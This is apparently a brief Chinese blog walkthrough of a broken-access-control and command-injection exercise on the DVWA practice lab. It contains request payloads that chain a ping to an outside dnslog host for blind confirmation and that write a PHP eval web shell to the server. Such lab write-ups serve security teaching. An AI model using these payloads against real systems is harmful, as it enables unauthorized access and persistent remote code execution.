失效的访问控制,可以认为是系统对一些功能进行了访问或权限限制,但因为种种原因,限制并没有生效,造成失效的访问控制漏洞,比如越权等
这里以DVWA为例,先访问低难度的命令执行并抓包
![](https://img-blog.csdnimg.cn/42604728f72b42ee8b3cd2a2545ec14a.png)
删除cookie,并在请求头添加路径\dv\vulnerabilities\exec\source\low.php
![](https://img-blog.csdnimg.cn/37dcc69046864667b2aaf364940e1506.png)
因为没有回显,使用dnslog,ip=127.0.0.1%26ping+v0999s.2iknuw.dnslog.cn&Submit=Submit
![](https://img-blog.csdnimg.cn/63dedacb057c4796a09ed1c904978cc4.png)
这里还可以通过这个漏洞写入木马
![](https://img-blog.csdnimg.cn/81f97a46f3ed470a8c1650416766895a.png)
ip=127.0.0.1%26echo+"<%3fphp+%40eval($_POST['cmd'])%3b%3f>">yc.php&Submit=Submit
![](https://img-blog.csdnimg.cn/481ae01a67f4435cb6fe49179988ceef.png)